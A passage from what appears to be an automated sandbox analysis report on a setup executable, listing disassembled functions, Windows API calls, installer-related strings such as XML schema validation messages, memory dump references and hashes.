                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$H_prolog3Path$AllocChangeCloseCombineException@8FindModuleNameNotificationPointerReadRelativeStringThrow
                                                              • String ID: Could not find mandatory data file %s. This is a bad package.$ReadXML failed to open XML file %s, with error %d
                                                              • API String ID: 1788304661-4172873023
                                                              • Opcode ID: 990406dab4b27e2d5ebf923fc362511731fd95592e3bd9f1ff3fdb47f15a2906
                                                              • Instruction ID: 914a7fc7e64f2ae1dcd411e9a6cc5502b3d85309a72b298912c11b72680fbc89
                                                              • Opcode Fuzzy Hash: 990406dab4b27e2d5ebf923fc362511731fd95592e3bd9f1ff3fdb47f15a2906
                                                              • Instruction Fuzzy Hash: 70912671902159AFCF00DFA8C885EDEBBB5EF09724F14461AE911B7790D734AA168BA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C925396 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 227memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92539D
                                                              • SysFreeString.OLEAUT32(?), ref: 6C925420
                                                              • SysAllocString.OLEAUT32(6C94FA6E), ref: 6C925490
                                                              • __EH_prolog3.LIBCMT ref: 6C9254B8
                                                              • __CxxThrowException@8.LIBCMT ref: 6C925540
                                                                • Part of subcall function 6C918415: __EH_prolog3.LIBCMT ref: 6C91841C
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              Strings
                                                              • \LocalizedData.xml: should have atleast one 'Language' child element!, xrefs: 6C925599
                                                              • ParameterInfo.xml, xrefs: 6C925565
                                                              • Unable to find Language element for LangID="%d" in localized data, xrefs: 6C92551A
                                                              • //Setup/LocalizedData/Language, xrefs: 6C9253CC
                                                              • W, xrefs: 6C925530
                                                              • Schema validation failure in file , xrefs: 6C925575
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$String$AllocException@8FreeThrow
                                                              • String ID: //Setup/LocalizedData/Language$ParameterInfo.xml$Schema validation failure in file $Unable to find Language element for LangID="%d" in localized data$W$\LocalizedData.xml: should have atleast one 'Language' child element!
                                                              • API String ID: 191698298-1863159554
                                                              • Opcode ID: ec7f8616d13e480a2c09ac4cd12884008c2fd0625811f6ea30ed586fdc806f60
                                                              • Instruction ID: 6e7e568515162efc3d8d36c2be25c73de027fba2101afa8c668873dff5f4846c
                                                              • Opcode Fuzzy Hash: ec7f8616d13e480a2c09ac4cd12884008c2fd0625811f6ea30ed586fdc806f60
                                                              • Instruction Fuzzy Hash: 3F919F71901209EFDB04CFE8C984AEDBBB9BF29318F244559E154EBB84C734DA09CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C93473C Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 210commemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C934746
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948380: __EH_prolog3.LIBCMT ref: 6C948387
                                                                • Part of subcall function 6C91388B: __EH_prolog3.LIBCMT ref: 6C913892
                                                                • Part of subcall function 6C934464: __EH_prolog3.LIBCMT ref: 6C93446B
                                                                • Part of subcall function 6C934682: __EH_prolog3.LIBCMT ref: 6C934689
                                                              • CoInitialize.OLE32(00000000), ref: 6C9347F7
                                                              • CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,?,?,?,?,?,6C913864,?,00000000,00000000,6C94FA6E,00000738,IronMan::EngineData::CreateEngineData), ref: 6C934815
                                                                • Part of subcall function 6C959D05: GetCommandLineW.KERNEL32(512AC3CC,?,00000000,ParameterInfo.xml,?,?,?,00000000,?,?,?,?,ParameterInfo.xml,?,00000000,?), ref: 6C959D54
                                                              • CoUninitialize.OLE32(?,02642228,00000000,?,?,succeeded,6C90A794,?,?,?,?,6C913864,?,00000000,00000000,6C94FA6E), ref: 6C9348ED
                                                              • SysFreeString.OLEAUT32(00000000), ref: 6C9348F9
                                                              • SysAllocString.OLEAUT32(?), ref: 6C93492E
                                                              • __CxxThrowException@8.LIBCMT ref: 6C9349BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$String$AllocCommandCreateException@8FreeH_prolog3_catchInitializeInstanceLineThrowUninitialize
                                                              • String ID: IronMan::EngineData::CreateEngineData$ParameterInfo.xml$succeeded$threw exception
                                                              • API String ID: 1482071144-3644667230
                                                              • Opcode ID: 828047b5277690716dabc727ea1245e64947232b4467f96400debb1b5c054e3a
                                                              • Instruction ID: 3167a8fb879ecbb2b80e9e265fb31b314beab4301681aca7f47f5d4a119205c3
                                                              • Opcode Fuzzy Hash: 828047b5277690716dabc727ea1245e64947232b4467f96400debb1b5c054e3a
                                                              • Instruction Fuzzy Hash: 23817B70900249EFCF01DFA8C888ADE7BB9AF69718F148559F518EBB41C775DA05CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4A6EE2 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 369COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4A6EE9
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C4931A0: __EH_prolog3.LIBCMT ref: 6C4931A7
                                                                • Part of subcall function 6C4931A0: _wcschr.LIBCMT ref: 6C4931E8
                                                                • Part of subcall function 6C4931A0: __CxxThrowException@8.LIBCMT ref: 6C4932A2
                                                                • Part of subcall function 6C4931A0: PathIsRelativeW.SHLWAPI(00000000,?,00000000,00000028,6C4A6F33,?,?,00000000,00000044,6C4A668B,?,00000000,00000000,?,?,succeeded), ref: 6C4932B9
                                                                • Part of subcall function 6C4931A0: PathFileExistsW.SHLWAPI(00000000,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C4932C6
                                                                • Part of subcall function 6C4945DE: __EH_prolog3.LIBCMT ref: 6C4945E5
                                                                • Part of subcall function 6C4960C9: __EH_prolog3.LIBCMT ref: 6C4960D0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Path$Exception@8ExistsFileRelativeThrow_wcschr
                                                              • String ID: ?$EulaPage$FinishPage$MaintenanceModePage$ProgressPage$ResourceDll$SystemRequirementsPage$WelcomePage$Windows
                                                              • API String ID: 1182493169-944454811
                                                              • Opcode ID: a5b93a495c0b120cf66a3d61a65dd8a031956f3c4f62e48e5eefe0e25b63b7cd
                                                              • Instruction ID: aae9e91e22a6e208dcc94cb59e40db467ab5c3631a43e110ca0e2c65569c6370
                                                              • Opcode Fuzzy Hash: a5b93a495c0b120cf66a3d61a65dd8a031956f3c4f62e48e5eefe0e25b63b7cd
                                                              • Instruction Fuzzy Hash: 47F1667190118DEFDB00DBE8C984FDEBBB8AF19218F184199E114E7785DB34DA0ADB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C934AD9 Relevance: 17.8, APIs: 2, Strings: 8, Instructions: 314COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C934AE0
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C9189B7: __EH_prolog3.LIBCMT ref: 6C9189BE
                                                                • Part of subcall function 6C9189B7: __CxxThrowException@8.LIBCMT ref: 6C918A89
                                                              • __CxxThrowException@8.LIBCMT ref: 6C934E3F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: Blockers$Configuration$EnterMaintenanceModeIf$Items$ParameterInfo.xml$Setup$SystemCheck$schema validation failure: wrong number of child elements under top level Setup element
                                                              • API String ID: 2489616738-3586895666
                                                              • Opcode ID: ec5cf46bc01dd54da32c5aaea851395a79383dd9f0994897380d5c661bb93fa9
                                                              • Instruction ID: 5c292e215224b9b2bde8254d5ce8916d5690ab8099d8b71c7bf6e61aaeea2c65
                                                              • Opcode Fuzzy Hash: ec5cf46bc01dd54da32c5aaea851395a79383dd9f0994897380d5c661bb93fa9
                                                              • Instruction Fuzzy Hash: 96C16F7190424DAFDB04DFA8C945AEEBBB9BF25308F108559F424E7B81C734DA09CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C926440 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 236COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C926447
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91A1FF: __EH_prolog3_catch.LIBCMT ref: 6C91A206
                                                              • __CxxThrowException@8.LIBCMT ref: 6C926666
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C918415: __EH_prolog3.LIBCMT ref: 6C91841C
                                                              Strings
                                                              • schema validation failure: If URL is present then there must be a DownloadSize, xrefs: 6C9265DA
                                                              • URL, xrefs: 6C926453
                                                              • ParameterInfo.xml, xrefs: 6C9265E8, 6C926688
                                                              • schema validation failure: If HashValue is present then it must be a 64 hex-digit string, xrefs: 6C92667A
                                                              • CompressedDownloadSize, xrefs: 6C926571
                                                              • CompressedHashValue, xrefs: 6C92652C
                                                              • HashValue, xrefs: 6C92649E
                                                              • DownloadSize, xrefs: 6C9264E3
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8H_prolog3_catchThrow
                                                              • String ID: CompressedDownloadSize$CompressedHashValue$DownloadSize$HashValue$ParameterInfo.xml$URL$schema validation failure: If HashValue is present then it must be a 64 hex-digit string$schema validation failure: If URL is present then there must be a DownloadSize
                                                              • API String ID: 24280941-3047338099
                                                              • Opcode ID: c95fba14325038a65df29e30ef44901576e8e4829f1d40efdce6e657eda07617
                                                              • Instruction ID: 1cb38f41271b13dc88d8b035b41dbbdd3c9d9263576d0d9b35a472de1062c13c
                                                              • Opcode Fuzzy Hash: c95fba14325038a65df29e30ef44901576e8e4829f1d40efdce6e657eda07617
                                                              • Instruction Fuzzy Hash: CFA17371904249DFCB14CFA8C944AEEBBF9AF25318F148559F065E7B80C734EA09CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C956782 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 235comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C956789
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C95988C: __EH_prolog3.LIBCMT ref: 6C959893
                                                                • Part of subcall function 6C95988C: GetCommandLineW.KERNEL32(0000002C,6C95D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9598B4
                                                                • Part of subcall function 6C95988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C95996E
                                                                • Part of subcall function 6C91A8CC: __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C91A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                                • Part of subcall function 6C91A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                                • Part of subcall function 6C91A8CC: __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                              • CoInitialize.OLE32(00000000), ref: 6C9567DD
                                                              • CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,6C94FA6E,?,?,?,UiInfo.xml,?,00000000,00000044,6C9536D8,02642228,?,00000000), ref: 6C9567FB
                                                              • __CxxThrowException@8.LIBCMT ref: 6C956A24
                                                              • CoUninitialize.OLE32(?,6C98BE00,?,?,?,UiInfo.xml,?,00000000,00000044,6C9536D8,02642228,?,00000000,?), ref: 6C956A3A
                                                              • SysFreeString.OLEAUT32(?), ref: 6C956A43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8PathRelativeThrow$CommandCreateFileFreeInitializeInstanceLineModuleNameStringUninitialize
                                                              • String ID: LCIDHints$ParameterInfo.xml$UiInfo.xml$Xml Document load failure
                                                              • API String ID: 2432735026-2443555527
                                                              • Opcode ID: 46136bef60c7fb05b644ce2f3969b4ca2fafff385bacc8d1177c6e369ddd6a2e
                                                              • Instruction ID: 7ca137ae1c833847d1277170e1b059f823e3c351ea627adb24df22090175fd27
                                                              • Opcode Fuzzy Hash: 46136bef60c7fb05b644ce2f3969b4ca2fafff385bacc8d1177c6e369ddd6a2e
                                                              • Instruction Fuzzy Hash: 60918371900148EFCB05DFE8C984AEDBBB9AF69308F248589E115EBB41D735DE05CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C919F34 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 223memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C919F3B
                                                              • VariantInit.OLEAUT32(00000003), ref: 6C919F49
                                                              • SysFreeString.OLEAUT32(?), ref: 6C919F83
                                                                • Part of subcall function 6C95964C: __get_errno.LIBCMT ref: 6C95966C
                                                                • Part of subcall function 6C95964C: __wcstoui64.LIBCMT ref: 6C95968F
                                                                • Part of subcall function 6C95964C: __get_errno.LIBCMT ref: 6C9596A1
                                                              • __ui64tow_s.LIBCMT ref: 6C919FEF
                                                              • __CxxThrowException@8.LIBCMT ref: 6C91A0BC
                                                              • SysAllocString.OLEAUT32(00000000), ref: 6C91A0C2
                                                              • VariantClear.OLEAUT32(?), ref: 6C91A0E9
                                                              Strings
                                                              • schema validation failure: %s is invalid, a non-negitive numeric value is required for %s, xrefs: 6C91A03C
                                                              • Name, xrefs: 6C91A121
                                                              • schema validation failure: attribute %s missing for %s %s, xrefs: 6C91A17B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: StringVariant__get_errno$AllocClearException@8FreeH_prolog3InitThrow__ui64tow_s__wcstoui64
                                                              • String ID: Name$schema validation failure: %s is invalid, a non-negitive numeric value is required for %s$schema validation failure: attribute %s missing for %s %s
                                                              • API String ID: 1723289333-1070666262
                                                              • Opcode ID: beae88ed2454df69f4592ece6065dff5d0b9d7b17c60a0ab613a26e25bc1679b
                                                              • Instruction ID: e56ec13a50473345da5c8f08901def9ad47c8e756e626933365a4fd71d1704dd
                                                              • Opcode Fuzzy Hash: beae88ed2454df69f4592ece6065dff5d0b9d7b17c60a0ab613a26e25bc1679b
                                                              • Instruction Fuzzy Hash: FA91AD71904249EFDF01CFA4C944ADEBBB9BF29318F184559E411EBB81DB30DA08CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91A8CC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 210filememoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                              • GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                              • __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                              • SetFilePointer.KERNEL32(?,00000000,6C90A794,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000,?), ref: 6C91AA49
                                                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91AA97
                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 6C91AAAC
                                                              • FindCloseChangeNotification.KERNEL32(?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91AB2C
                                                              Strings
                                                              • Could not find mandatory data file %s. This is a bad package., xrefs: 6C91AAE5
                                                              • ReadXML failed to open XML file %s, with error %d, xrefs: 6C91AA07
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: File$H_prolog3$AllocChangeCloseException@8FindModuleNameNotificationPathPointerReadRelativeStringThrow
                                                              • String ID: Could not find mandatory data file %s. This is a bad package.$ReadXML failed to open XML file %s, with error %d
                                                              • API String ID: 956789720-4172873023
                                                              • Opcode ID: 7759b2bd2336004e1642b97f713ab6c7a2766ef8ef49a43f64d46839b2723f42
                                                              • Instruction ID: e6db30aa1650404a37fbabfbac8dede156c6ebe05665acb99da8d3a69bdcbaec
                                                              • Opcode Fuzzy Hash: 7759b2bd2336004e1642b97f713ab6c7a2766ef8ef49a43f64d46839b2723f42
                                                              • Instruction Fuzzy Hash: 63816971904209EFDF00DFA4C8859EEBBBABF19318F14451AE510B7B90CB34DA19CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4931A0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4931A7
                                                                • Part of subcall function 6C48D76F: __EH_prolog3.LIBCMT ref: 6C48D776
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                              • _wcschr.LIBCMT ref: 6C4931E8
                                                              • __CxxThrowException@8.LIBCMT ref: 6C4932A2
                                                                • Part of subcall function 6C4ADBDB: RaiseException.KERNEL32(?,?,6C4A9236,?,?,?,?,?,6C4A9236,?,6C4B7F54,6C4C22B4), ref: 6C4ADC1D
                                                              • PathIsRelativeW.SHLWAPI(00000000,?,00000000,00000028,6C4A6F33,?,?,00000000,00000044,6C4A668B,?,00000000,00000000,?,?,succeeded), ref: 6C4932B9
                                                              • PathFileExistsW.SHLWAPI(00000000,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C4932C6
                                                              • PathFileExistsW.SHLWAPI(?,00000000,?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 6C493307
                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,6C4A2A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6C49E271,00000000), ref: 6C49330A
                                                                • Part of subcall function 6C48CA39: __EH_prolog3.LIBCMT ref: 6C48CA40
                                                                • Part of subcall function 6C48CAC2: __EH_prolog3.LIBCMT ref: 6C48CAC9
                                                                • Part of subcall function 6C48D170: __EH_prolog3.LIBCMT ref: 6C48D177
                                                              Strings
                                                              • Successfuly found file %s , xrefs: 6C493341
                                                              • UIInfo.xml, xrefs: 6C493234
                                                              • UiInfo.xml has INVALID ResourceDLLName %s, xrefs: 6C493222
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Path$ExistsFile$ExceptionException@8RaiseRelativeThrow_wcschr
                                                              • String ID: Successfuly found file %s $UIInfo.xml$UiInfo.xml has INVALID ResourceDLLName %s
                                                              • API String ID: 1926448744-2896109536
                                                              • Opcode ID: 2be98c070d8d58e8d0e36fec99b890407ef6881b147a54800f49caddf787c8b5
                                                              • Instruction ID: 3b1c313fa1ef5a9b6bab3f0c696ebcae71aca5c0ad6dfd348ad0c8b864a043e7
                                                              • Opcode Fuzzy Hash: 2be98c070d8d58e8d0e36fec99b890407ef6881b147a54800f49caddf787c8b5
                                                              • Instruction Fuzzy Hash: E5715A71901259EFDB00DBE8C984EDEBBB8BF15318F14455AE414B7781DB34EA09CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C94A78F Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 160COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C94A796
                                                                • Part of subcall function 6C91C5D4: __EH_prolog3.LIBCMT ref: 6C91C5DB
                                                                • Part of subcall function 6C91C5D4: GetLastError.KERNEL32 ref: 6C91C609
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C951236: __EH_prolog3.LIBCMT ref: 6C95123D
                                                              • GetLastError.KERNEL32 ref: 6C94A83B
                                                              • GetLastError.KERNEL32 ref: 6C94A8F4
                                                              • GetLastError.KERNEL32 ref: 6C94A95B
                                                              Strings
                                                              • Failed to record IsRetailBuild, xrefs: 6C94A975
                                                              • Failed to record PatchType, xrefs: 6C94A90E
                                                              • Failed to record InstallerVersion, xrefs: 6C94A8B0
                                                              • Failed to record PackageName, xrefs: 6C94A7B8
                                                              • Failed to record PackageVersion, xrefs: 6C94A7F7
                                                              • Failed to record DisplayedLcidId, xrefs: 6C94A855
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
